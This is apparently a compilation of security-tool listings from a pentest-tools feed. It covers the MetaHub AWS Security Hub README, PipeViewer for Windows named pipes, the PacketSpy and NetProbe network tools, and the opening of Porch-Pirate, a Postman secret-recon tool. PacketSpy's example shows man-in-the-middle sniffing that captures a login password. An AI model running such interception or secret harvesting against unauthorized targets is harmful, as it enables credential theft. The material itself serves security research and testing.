  • Trigger the MetaHub Lambda function each time there is a new security finding to enrich that finding back in AWS Security Hub.
  • Trigger the MetaHub Lambda function each time there is a new security finding for suppression based on Context.
  • Trigger the MetaHub Lambda function to identify the affected owner of a security finding based on Context and assign it using your internal systems.
  • Trigger the MetaHub Lambda function to create a ticket with enriched context.

Deploying Lambda

The terraform code for deploying the Lambda function is provided under the terraform/ folder.

Just run the following commands:

cd terraform
terraform init
terraform apply

The code will create a zip file for the lambda code and a zip file for the Python dependencies. It will also create a Lambda function and all the required resources.

Customize Lambda behaviour

You can customize MetaHub options for your lambda by editing the file lib/lambda.py. You can change the default options for MetaHub, such as the filters, the Meta* options, and more.

Lambda Permissions

Terraform will create the minimum required permissions for the Lambda function to run locally (in the same account). If you want your Lambda to assume a role in other accounts (for example, if you are executing the Lambda in the Security Hub master account that is aggregating findings from other accounts), you will need to specify the role to assume by adding the option --mh-assume-role to the Lambda function configuration (see the previous step) and adding the corresponding policy to the Lambda role allowing it to assume that role.

Run with Security Hub Custom Action

MetaHub can be run as a Security Hub Custom Action. This allows you to run MetaHub directly from the Security Hub console for a selected finding or for a selected set of findings.


The custom action will then trigger a Lambda function that will run MetaHub for the selected findings. By default, the Lambda function will run MetaHub with the option --enrich-findings, which means that it will update your finding back with MetaHub outputs. If you want to change this, see Customize Lambda behavior

You need first to create the Lambda function and then create the custom action in Security Hub.

For creating the lambda function, follow the instructions in the Run with Lambda section.

For creating the AWS Security Hub custom action:

  1. In Security Hub, choose Settings and then choose Custom Actions.
  2. Choose Create custom action.
  3. Provide a Name, Description, and Custom action ID for the action.
  4. Choose Create custom action. (Make a note of the Custom action ARN. You need to use the ARN when you create a rule to associate with this action in EventBridge.)
  5. In EventBridge, choose Rules and then choose Create rule.
  6. Enter a name and description for the rule.
  7. For the Event bus, choose the event bus that you want to associate with this rule. If you want this rule to match events that come from your account, select default. When an AWS service in your account emits an event, it always goes to your account's default event bus.
  8. For Rule type, choose a rule with an event pattern and then press Next.
  9. For Event source, choose AWS events.
  10. For the Creation method, choose Use pattern form.
  11. For Event source, choose AWS services.
  12. For AWS service, choose Security Hub.
  13. For Event type, choose Security Hub Findings - Custom Action.
  14. Choose Specific custom action ARNs and add a custom action ARN.
  15. Choose Next.
  16. Under Select targets, choose the Lambda function.
  17. Select the Lambda function you created for MetaHub.
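If you prefer to script steps 5 to 17 instead of clicking through the console, a minimal boto3 sketch could look like the following. The rule name and both ARNs are placeholders; the event pattern follows the documented shape for Security Hub custom-action events.

import json

import boto3

events = boto3.client("events")
awslambda = boto3.client("lambda")

custom_action_arn = "arn:aws:securityhub:eu-west-1:111111111111:action/custom/MetaHub"  # placeholder
metahub_lambda_arn = "arn:aws:lambda:eu-west-1:111111111111:function:metahub"  # placeholder

# Rule matching the Security Hub custom action (steps 5-15)
events.put_rule(
    Name="metahub-custom-action",
    EventPattern=json.dumps({
        "source": ["aws.securityhub"],
        "detail-type": ["Security Hub Findings - Custom Action"],
        "resources": [custom_action_arn],
    }),
)

# Point the rule at the MetaHub Lambda function (steps 16-17)
events.put_targets(
    Rule="metahub-custom-action",
    Targets=[{"Id": "metahub", "Arn": metahub_lambda_arn}],
)

# EventBridge also needs permission to invoke the function
awslambda.add_permission(
    FunctionName=metahub_lambda_arn,
    StatementId="allow-eventbridge-metahub",
    Action="lambda:InvokeFunction",
    Principal="events.amazonaws.com",
)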

AWS Authentication

  • Ensure you have AWS credentials set up on your local machine (or from where you will run MetaHub).

For example, you can use aws configure option.

aws configure

Or you can export your credentials to the environment.

export AWS_DEFAULT_REGION="us-east-1"
export AWS_ACCESS_KEY_ID="ASXXXXXXX"
export AWS_SECRET_ACCESS_KEY="XXXXXXXXX"
export AWS_SESSION_TOKEN="XXXXXXXXX"

Configuring Security Hub

  • If you are running MetaHub for a single AWS account setup (AWS Security Hub is not aggregating findings from different accounts), you don't need to use any additional options; MetaHub will use the credentials in your environment. Still, if your IAM design requires it, it is possible to log in and assume a role in the same account you are logged in. Just use the options --sh-assume-role to specify the role and --sh-account with the same AWS Account ID where you are logged in.

  • --sh-region: The AWS Region where Security Hub is running. If you don't specify a region, it will use the one configured in your environment. If you are using AWS Security Hub Cross-Region aggregation, you should use that region as the --sh-region option so that you can fetch all findings together.

  • --sh-account and --sh-assume-role: The AWS Account ID where Security Hub is running and the AWS IAM role to assume in that account. These options are helpful when you are logged in to a different AWS Account than the one where AWS Security Hub is running or when running AWS Security Hub in a multiple AWS Account setup. Both options must be used together. The role provided needs to have enough policies to get and update findings in AWS Security Hub (if needed). If you don't specify a --sh-account, MetaHub will assume the one you are logged in.

  • --sh-profile: You can also provide your AWS profile name to use for AWS Security Hub. When using this option, you don't need to specify --sh-account or --sh-assume-role as MetaHub will use the credentials from the profile. If you are using --sh-account and --sh-assume-role, those options take precedence over --sh-profile.

IAM Policy for Security Hub

This is the minimum IAM policy you need to read and write from AWS Security Hub. If you don't want to update your findings with MetaHub, you can remove the securityhub:BatchUpdateFindings action.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "securityhub:GetFindings",
        "securityhub:ListFindingAggregators",
        "securityhub:BatchUpdateFindings",
        "iam:ListAccountAliases"
      ],
      "Resource": [
        "*"
      ]
    }
  ]
}

Configuring Context

If you are running MetaHub for a multiple AWS Account setup (AWS Security Hub is aggregating findings from multiple AWS Accounts), you must provide the role to assume for Context queries, because the affected resources are not in the same AWS Account as the AWS Security Hub findings. The role provided with --mh-assume-role will be used to connect directly to the affected resources in the affected account. This role needs enough policies to describe resources.
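Under the hood this is the standard STS assume-role pattern; a minimal boto3 sketch, assuming a placeholder role ARN in the affected account:

import boto3

sts = boto3.client("sts")
credentials = sts.assume_role(
    RoleArn="arn:aws:iam::222222222222:role/metahub-context",  # placeholder role in the affected account
    RoleSessionName="metahub-context",
)["Credentials"]

# Describe resources in the affected account with the temporary credentials
ec2 = boto3.client(
    "ec2",
    aws_access_key_id=credentials["AccessKeyId"],
    aws_secret_access_key=credentials["SecretAccessKey"],
    aws_session_token=credentials["SessionToken"],
)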

IAM Policy for Context

The minimum policy needed for context includes the managed policy arn:aws:iam::aws:policy/SecurityAudit and the following actions:

  • tag:GetResources
  • lambda:GetFunction
  • lambda:GetFunctionUrlConfig
  • cloudtrail:LookupEvents
  • account:GetAlternateContact
  • organizations:DescribeAccount
  • iam:ListAccountAliases

Examples

Inputs

MetaHub can read security findings directly from AWS Security Hub using its API. If you don't use Security Hub, you can use any ASFF-based scanner. Most cloud security scanners support the ASFF format. Check with them or leave an issue if you need help.

If you want to read from an input ASFF file, you need to use the options:

./metahub.py --inputs file-asff --input-asff path/to/the/file.json.asff path/to/the/file2.json.asff

You also can combine AWS Security Hub findings with input ASFF files specifying both inputs:

./metahub.py --inputs file-asff securityhub --input-asff path/to/the/file.json.asff

When using a file as input, you can't use the option --sh-filters to filter findings, as this option relies on the AWS API. You also can't use the options --update-findings or --enrich-findings, as those findings are not in AWS Security Hub. If you are reading from both sources at the same time, only the findings from AWS Security Hub will be updated.

Output Modes

MetaHub can generate different programmatic and visual outputs. By default, all output modes are enabled: json-short, json-full, json-statistics, json-inventory, html, csv, and xlsx.

The outputs will be saved in the outputs/ folder with the execution date.

If you want only to generate a specific output mode, you can use the option --output-modes with the desired output mode.

For example, if you only want to generate the output json-short, you can use:

./metahub.py --output-modes json-short

If you want to generate json-short, json-full and html outputs, you can use:

./metahub.py --output-modes json-short json-full html

JSON

JSON-Short

Show all finding titles together under each affected resource, along with the AwsAccountId, Region, and ResourceType.

JSON-Full

Show all findings with all their data. Findings are organized by ResourceId (ARN). For each finding, you will also get: SeverityLabel, Workflow, RecordState, Compliance, Id, and ProductArn.

JSON-Inventory

Show a list of all resources with their ARN.

JSON-Statistics

Show statistics for each field/value. In the output, you will see each field/value pair and its number of occurrences across your findings.

HTML

You can create rich HTML reports of your findings, adding your context as part of them.

HTML Reports are interactive in many ways:

  • You can add/remove columns.
  • You can sort and filter by any column.
  • You can auto-filter by any column
  • You can group/ungroup findings
  • You can also download that data to xlsx, CSV, HTML, and JSON.


CSV

You can create CSV reports of your findings, adding your context as part of them.


XLSX

Similar to CSV but with more formatting options.


Customize HTML, CSV or XLSX outputs

You can customize which Context keys to unroll as columns for your HTML, CSV, and XLSX outputs using the options --output-tag-columns and --output-config-columns (as a list of columns). If the keys you specified don't exist for the affected resource, they will be empty. You can also configure these columns by default in the configuration file (See Customizing Configuration).

For example, you can generate an HTML output with Tags and add "Owner" and "Environment" as columns to your report using:

./metahub --output-modes html --output-tag-columns Owner Environment

Filters

You can filter the security findings and resources that you get from your source in different ways and combine all of them to get exactly what you are looking for, then re-use those filters to create alerts.

Security Hub Filtering

MetaHub supports filtering AWS Security Hub findings in the form of KEY=VALUE using the option --sh-filters, the same way you would filter with the AWS CLI, but limited to the EQUALS comparison. If you need another comparison, use YAML templates with the option --sh-template (see Security Hub Filtering using YAML templates). A boto3 equivalent of this filtering is sketched after the examples below.

You can check the available filters in the AWS documentation.

./metahub --sh-filters <KEY=VALUE>

If you don't specify any filters, default filters are applied: RecordState=ACTIVE WorkflowStatus=NEW

Passing filters using this option resets the default filters. If you want to add filters to the defaults, you need to specify them in addition to the default ones. For example, adding SeverityLabel to the default filters:

./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL

If a value contains spaces, you should specify it using double quotes: ProductName="Security Hub"

You can add how many different filters you need to your query and also add the same filter key with different values:

Examples:

  • Filter by Severity (CRITICAL):
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL
  • Filter by Severity (CRITICAL and HIGH):
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL SeverityLabel=HIGH
  • Filter by Severity and AWS Account:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL AwsAccountId=1234567890
  • Filter by Check Title:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW Title="EC2.22 Unused EC2 security groups should be removed"
  • Filter by AWS Resource Type:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup
  • Filter by Resource ID:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceId="arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890"
  • Filter by Finding Id:
./metahub --sh-filters Id="arn:aws:securityhub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.19/finding/01234567890-1234-1234-1234-01234567890"
  • Filter by Compliance Status:
./metahub --sh-filters ComplianceStatus=FAILED
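For reference, an expression like --sh-filters RecordState=ACTIVE WorkflowStatus=NEW maps onto the Security Hub GetFindings API roughly like this boto3 sketch:

import boto3

securityhub = boto3.client("securityhub")

# Each KEY=VALUE pair becomes a StringFilter with the EQUALS comparison
filters = {
    "RecordState": [{"Value": "ACTIVE", "Comparison": "EQUALS"}],
    "WorkflowStatus": [{"Value": "NEW", "Comparison": "EQUALS"}],
}

paginator = securityhub.get_paginator("get_findings")
for page in paginator.paginate(Filters=filters):
    for finding in page["Findings"]:
        print(finding["Id"])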

Security Hub Filtering using YAML templates

MetaHub lets you create complex filters using YAML files (templates) that you can re-use when needed. YAML templates let you write filters using any comparison supported by AWS Security Hub, such as 'EQUALS', 'PREFIX', 'NOT_EQUALS', or 'PREFIX_NOT_EQUALS'. You can call your YAML file using the option --sh-template <FILE>.

You can find examples under the templates folder.

  • Filter using YAML template default.yml:
./metahub --sh-template templates/default.yml

Config Filters

MetaHub supports Config filters (and associations) using KEY=VALUE where the value can only be True or False using the option --mh-filters-config. You can use as many filters as you want and separate them using spaces. If you specify more than one filter, you will get all resources that match all filters.

Config filters only support True or False values:

  • A Config filter set to True means True or with data.
  • A Config filter set to False means False or without data.

Config filters run after AWS Security Hub filters:

  1. MetaHub fetches AWS Security Findings based on the filters you specified using --sh-filters (or the default ones).
  2. MetaHub executes Context for the AWS-affected resources based on the previous list of findings
  3. MetaHub only shows you the resources that match your --mh-filters-config, so it's a subset of the resources from point 1.

Examples:

  • Get all Security Groups (ResourceType=AwsEc2SecurityGroup) with AWS Security Hub findings that are ACTIVE and NEW (RecordState=ACTIVE WorkflowStatus=NEW) only if they are associated to Network Interfaces (network_interfaces=True):
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup --mh-filters-config network_interfaces=True
  • Get all S3 Buckets (ResourceType=AwsS3Bucket) only if they are public (public=True):
./metahub --sh-filters ResourceType=AwsS3Bucket --mh-filters-config public=True

Tags Filters

MetaHub supports Tags filters in the form of KEY=VALUE where KEY is the Tag name and value is the Tag Value. You can use as many filters as you want and separate them using spaces. Specifying multiple filters will give you all resources that match at least one filter.

Tags filters run after AWS Security Hub filters:

  1. MetaHub fetches AWS Security Findings based on the filters you specified using --sh-filters (or the default ones).
  2. MetaHub executes Tags for the AWS-affected resources based on the previous list of findings
  3. MetaHub only shows you the resources that match your --mh-filters-tags, so it's a subset of the resources from point 1.

Examples:

  • Get all Security Groups (ResourceType=AwsEc2SecurityGroup) with AWS Security Hub findings that are ACTIVE and NEW (RecordState=ACTIVE WorkflowStatus=NEW) only if they are tagged with a tag Environment and value Production:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup --mh-filters-tags Environment=Production

Updating Workflow Status

You can use MetaHub to update your AWS Security Hub Findings workflow status (NOTIFIED, NEW, RESOLVED, SUPPRESSED) with a single command. You will use the --update-findings option to update all the findings from your MetaHub query. This means you can update one, ten, or thousands of findings using only one command. The AWS Security Hub API is limited to 100 findings per update, so MetaHub splits your results into chunks of 100 items to work around this limitation and update your findings regardless of the amount.
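Conceptually, the chunked update looks like this boto3 sketch (the finding identifiers are placeholders for the ones returned by your query):

import boto3

securityhub = boto3.client("securityhub")

finding_identifiers = [
    # Placeholders: in practice, one {"Id": ..., "ProductArn": ...} dict per finding
    {"Id": "finding-arn-1", "ProductArn": "product-arn-1"},
]

# BatchUpdateFindings accepts at most 100 findings per call, so update in chunks
for i in range(0, len(finding_identifiers), 100):
    securityhub.batch_update_findings(
        FindingIdentifiers=finding_identifiers[i : i + 100],
        Workflow={"Status": "NOTIFIED"},
        Note={"Text": "Your ticket ID or reason here", "UpdatedBy": "metahub"},
    )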

For example, using the following filter: ./metahub --sh-filters ResourceType=AwsSageMakerNotebookInstance RecordState=ACTIVE WorkflowStatus=NEW I found two affected resources with three findings each, making six Security Hub findings in total.

Running the following update command will update those six findings' workflow status to NOTIFIED with a Note:

./metahub --update-findings Workflow=NOTIFIED Note="Enter your ticket ID or reason here as a note that you will add to the finding as part of this update."




The --update-findings will ask you for confirmation before updating your findings. You can skip this confirmation by using the option --no-actions-confirmation.

Enriching Findings

You can use MetaHub to enrich back your AWS Security Hub Findings with Context outputs using the option --enrich-findings. Enriching your findings means updating them directly in AWS Security Hub. MetaHub uses the UserDefinedFields field for this.

By enriching your findings directly in AWS Security Hub, you can take advantage of features like Insights and Filters by using the extra information not available in Security Hub before.

For example, you want to enrich all AWS Security Hub findings with WorkflowStatus=NEW, RecordState=ACTIVE, and ResourceType=AwsS3Bucket that are public=True with Context outputs:

./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsS3Bucket --mh-filters-config public=True --enrich-findings
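Under the hood, enrichment is a write to each finding's UserDefinedFields, roughly like this boto3 sketch (identifiers and keys are placeholders; UserDefinedFields values must be strings):

import boto3

securityhub = boto3.client("securityhub")
securityhub.batch_update_findings(
    FindingIdentifiers=[{"Id": "finding-arn", "ProductArn": "product-arn"}],  # placeholders
    UserDefinedFields={"public": "True"},  # illustrative Context output
)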



The --enrich-findings will ask you for confirmation before enriching your findings. You can skip this confirmation by using the option --no-actions-confirmation.

Findings Aggregation

Working with security findings sometimes introduces the problems of shadowing and duplication.

Shadowing is when two checks refer to the same issue, but one is more generic than the other.

Duplication is when you use more than one scanner and the same problem is reported more than once.

Think of a Security Group with port 3389/TCP open to 0.0.0.0/0. Let's use Security Hub findings as an example.

If you are using one of the default Security Standards like AWS-Foundational-Security-Best-Practices, you will get two findings for the same issue:

  • EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports
  • EC2.19 Security groups should not allow unrestricted access to ports with high risk

If you are also using the standard CIS AWS Foundations Benchmark, you will also get an extra finding:

  • 4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389

Now, imagine that SG is not in use. In that case, Security Hub will show an additional fourth finding for your resource!

  • EC2.22 Unused EC2 security groups should be removed

So now you have four findings for one resource in your dashboard!

Suppose you are working with multi-account setups and many resources. In that case, this could result in many findings that refer to the same thing without adding any extra value to your analysis.

MetaHub aggregates security findings under the affected resource.

This is how MetaHub shows the previous example with output-mode json-short:

"arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890": {
"findings": [
"EC2.19 Security groups should not allow unrestricted access to ports with high risk",
"EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports",
"4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389",
"EC2.22 Unused EC2 security groups should be removed"
],
"AwsAccountId": "01234567890",
"Region": "eu-west-1",
"ResourceType": "AwsEc2SecurityGroup"
}

This is how MetaHub shows the previous example with output-mode json-full:

"arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890": {
"findings": [
{
"EC2.19 Security groups should not allow unrestricted access to ports with high risk": {
"SeverityLabel": "CRITICAL",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports": {
"SeverityLabel": "HIGH",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",< br/> "Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389": {
"SeverityLabel": "HIGH",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"EC2.22 Unused EC2 security groups should be removed": {
"SeverityLabel": "MEDIUM",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
}
],
"AwsAccountId": "01234567890",
"AwsAccountAlias": "obfuscated",
"Region": "eu-west-1",
"ResourceType": "AwsEc2SecurityGroup"
}

Your findings are combined under the ARN of the resource affected, ending in only one result or one non-compliant resource.

You can now work in MetaHub with all these four findings together as if they were only one. For example, you can update the Workflow Status of these four findings using only one command (see Updating Workflow Status).

Contributing

You can follow this guide if you want to contribute to the Context module.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

PipeViewer - A Tool That Shows Detailed Information About Named Pipes In Windows

By: Zion3R β€” December 20th 2023 at 11:30


A GUI tool for viewing Windows Named Pipes and searching for insecure permissions.

The tool was published as part of a research about Docker named pipes:
"Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation – Part 1"
"Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation – Part 2"

Overview

PipeViewer is a GUI tool that allows users to view details about Windows Named pipes and their permissions. It is designed to be useful for security researchers who are interested in searching for named pipes with weak permissions or testing the security of named pipes. With PipeViewer, users can easily view and analyze information about named pipes on their systems, helping them to identify potential security vulnerabilities and take appropriate steps to secure their systems.


Usage

Double-click the EXE binary and you will get the list of all named pipes.

Build

We used Visual Studio to compile it.
When downloading it from GitHub, you might get errors about blocked files; you can use PowerShell to unblock them:

Get-ChildItem -Path 'D:\tmp\PipeViewer-main' -Recurse | Unblock-File

Warning

We built the project and uploaded it, so you can find it in the releases.
One problem is that the binary will trigger alerts from Windows Defender because it uses the NtObjectManager package, which is flagged as a virus.
Note that James Forshaw talked about it here.
We can't change this because we depend on a third-party DLL.

Features

  • A detailed overview of named pipes.
  • Filter\highlight rows based on cells.
  • Bold specific rows.
  • Export\Import to\from JSON.
  • PipeChat - create a connection with available named pipes.

Demo

PipeViewer3_v1.0.mp4

Credit

We want to thank James Forshaw (@tyranid) for creating the open source NtApiDotNet which allowed us to get information about named pipes.

License

Copyright (c) 2023 CyberArk Software Ltd. All rights reserved
This repository is licensed under Apache-2.0 License - see LICENSE for more details.

References

For more comments, suggestions or questions, you can contact Eviatar Gerzi (@g3rzi) and CyberArk Labs.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

PacketSpy - Powerful Network Packet Sniffing Tool Designed To Capture And Analyze Network Traffic

By: Zion3R β€” December 15th 2023 at 11:30


PacketSpy is a powerful network packet sniffing tool designed to capture and analyze network traffic. It provides a comprehensive set of features for inspecting HTTP requests and responses, viewing raw payload data, and gathering information about network devices. With PacketSpy, you can gain valuable insights into your network's communication patterns and troubleshoot network issues effectively.


Features

  • Packet Capture: Capture and analyze network packets in real-time.
  • HTTP Inspection: Inspect HTTP requests and responses for detailed analysis.
  • Raw Payload Viewing: View raw payload data for deeper investigation.
  • Device Information: Gather information about network devices, including IP addresses and MAC addresses.

Installation

git clone https://github.com/HalilDeniz/PacketSpy.git

Requirements

PacketSpy requires the following dependencies to be installed:

pip install -r requirements.txt

Getting Started

To get started with PacketSpy, use the following command-line options:

root@denizhalil:/PacketSpy# python3 packetspy.py --help                          
usage: packetspy.py [-h] [-t TARGET_IP] [-g GATEWAY_IP] [-i INTERFACE] [-tf TARGET_FIND] [--ip-forward] [-m METHOD]

options:
-h, --help show this help message and exit
-t TARGET_IP, --target TARGET_IP
Target IP address
-g GATEWAY_IP, --gateway GATEWAY_IP
Gateway IP address
-i INTERFACE, --interface INTERFACE
Interface name
-tf TARGET_FIND, --targetfind TARGET_FIND
Target IP range to find
--ip-forward, -if Enable packet forwarding
-m METHOD, --method METHOD
Limit sniffing to a specific HTTP method

Examples

  1. Device Detection
root@denizhalil:/PacketSpy# python3 packetspy.py -tf 10.0.2.0/24 -i eth0

Device discovery
**************************************
Ip Address Mac Address
**************************************
10.0.2.1 52:54:00:12:35:00
10.0.2.2 52:54:00:12:35:00
10.0.2.3 08:00:27:78:66:95
10.0.2.11 08:00:27:65:96:cd
10.0.2.12 08:00:27:2f:64:fe

  1. Man-in-the-Middle Sniffing
root@denizhalil:/PacketSpy# python3 packetspy.py -t 10.0.2.11 -g 10.0.2.1 -i eth0
******************* started sniff *******************

HTTP Request:
Method: b'POST'
Host: b'testphp.vulnweb.com'
Path: b'/userinfo.php'
Source IP: 10.0.2.20
Source MAC: 08:00:27:04:e8:82
Protocol: HTTP
User-Agent: b'Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0'

Raw Payload:
b'uname=admin&pass=mysecretpassword'

HTTP Response:
Status Code: b'302'
Content Type: b'text/html; charset=UTF-8'
--------------------------------------------------

FootNote

HTTPS support is still a work in progress.

Contributing

Contributions are welcome! To contribute to PacketSpy, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact

If you have any questions, comments, or suggestions about PacketSpy, please feel free to contact me:

License

PacketSpy is released under the MIT License. See LICENSE for more information.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

NetProbe - Network Probe

By: Zion3R β€” December 12th 2023 at 11:30


NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.
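The core idea, broadcasting ARP requests across a subnet and reading the IP and MAC addresses out of the replies, can be sketched in a few lines of scapy (the subnet is an example; the manufacturer lookup that NetProbe adds on top is omitted):

from scapy.all import ARP, Ether, srp

# Broadcast an ARP who-has for every address in the subnet
answered, _ = srp(
    Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst="192.168.1.0/24"),
    timeout=2,
    verbose=False,
)

for _, reply in answered:
    print(reply.psrc, reply.hwsrc)  # IP address and MAC address of a responding device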

Features

  • Scan for devices on a specified IP address or subnet
  • Display the IP address, MAC address, manufacturer, and device model of discovered devices
  • Live tracking of devices (optional)
  • Save scan results to a file (optional)
  • Filter by manufacturer (e.g., 'Apple') (optional)
  • Filter by IP range (e.g., '192.168.1.0/24') (optional)
  • Scan rate in seconds (default: 5) (optional)

Download

You can download the program from the GitHub page.

$ git clone https://github.com/HalilDeniz/NetProbe.git

Installation

To install the required libraries, run the following command:

$ pip install -r requirements.txt

Usage

To run the program, use the following command:

$ python3 netprobe.py [-h] -t [...] -i [...] [-l] [-o] [-m] [-r] [-s]
  β€’ -h, --help: show this help message and exit
  β€’ -t, --target: Target IP address or subnet (default: 192.168.1.0/24)
  β€’ -i, --interface: Interface to use (default: None)
  β€’ -l, --live: Enable live tracking of devices
  β€’ -o, --output: Output file to save the results
  β€’ -m, --manufacturer: Filter by manufacturer (e.g., 'Apple')
  β€’ -r, --ip-range: Filter by IP range (e.g., '192.168.1.0/24')
  β€’ -s, --scan-rate: Scan rate in seconds (default: 5)

Example:

$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l

Help Menu

$ python3 netprobe.py --help
usage: netprobe.py [-h] -t [...] -i [...] [-l] [-o] [-m] [-r] [-s]

NetProbe: Network Scanner Tool

options:
  -h, --help            show this help message and exit
  -t [ ...], --target [ ...]
                        Target IP address or subnet (default: 192.168.1.0/24)
  -i [ ...], --interface [ ...]
                        Interface to use (default: None)
  -l, --live            Enable live tracking of devices
  -o , --output         Output file to save the results
  -m , --manufacturer   Filter by manufacturer (e.g., 'Apple')
  -r , --ip-range       Filter by IP range (e.g., '192.168.1.0/24')
  -s , --scan-rate      Scan rate in seconds (default: 5)

Default Scan

$ python3 netprobe.py 

Live Tracking

You can enable live tracking of devices on your network by using the -l or --live flag. This will continuously update the device list every 5 seconds.

$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l

Save Results

You can save the scan results to a file by using the -o or --output flag followed by the desired output file name.

$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l -o results.txt
┏━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ IP Address   ┃ MAC Address       ┃ Packet Size ┃ Manufacturer                 ┃
┑━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
β”‚ 192.168.1.1  β”‚ **:6e:**:97:**:28 β”‚ 102         β”‚ ASUSTek COMPUTER INC.        β”‚
β”‚ 192.168.1.3  β”‚ 00:**:22:**:12:** β”‚ 102         β”‚ InPro Comm                   β”‚
β”‚ 192.168.1.2  β”‚ **:32:**:bf:**:00 β”‚ 102         β”‚ Xiaomi Communications Co Ltd β”‚
β”‚ 192.168.1.98 β”‚ d4:**:64:**:5c:** β”‚ 102         β”‚ ASUSTek COMPUTER INC.        β”‚
β”‚ 192.168.1.25 β”‚ **:49:**:00:**:38 β”‚ 102         β”‚ Unknown                      β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Contact

If you have any questions, suggestions, or feedback about the program, please feel free to reach out to me through any of the following platforms:

License

This program is released under the MIT LICENSE. See LICENSE for more information.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Porch-Pirate - The Most Comprehensive Postman Recon / OSINT Client And Framework That Facilitates The Automated Discovery And Exploitation Of API Endpoints And Secrets Committed To Workspaces, Collections, Requests, Users And Teams

By: Zion3R β€” December 5th 2023 at 11:30


Porch Pirate started as a tool to quickly uncover Postman secrets, and has slowly begun to evolve into a multi-purpose reconnaissance / OSINT framework for Postman. While existing tools are great proofs of concept, they only attempt to identify very specific keywords as "secrets", and in very limited locations, with no consideration of recon beyond secrets. We realized we required capabilities that were "secret-agnostic" and had enough flexibility to capture false positives that still provided offensive value.

Porch Pirate enumerates and presents sensitive results (global secrets, unique headers, endpoints, query parameters, authorization, etc), from publicly accessible Postman entities, such as:

  • Workspaces
  • Collections
  • Requests
  • Users
  • Teams

Installation

python3 -m pip install porch-pirate

Using the client

The Porch Pirate client can be used to conduct nearly complete reviews of public Postman entities in a quick and simple fashion. There are intended workflows and particular keywords to be used that can typically maximize results. These methodologies can be located on our blog: Plundering Postman with Porch Pirate.

Porch Pirate supports the following arguments to be performed on collections, workspaces, or users.

  • --globals
  • --collections
  • --requests
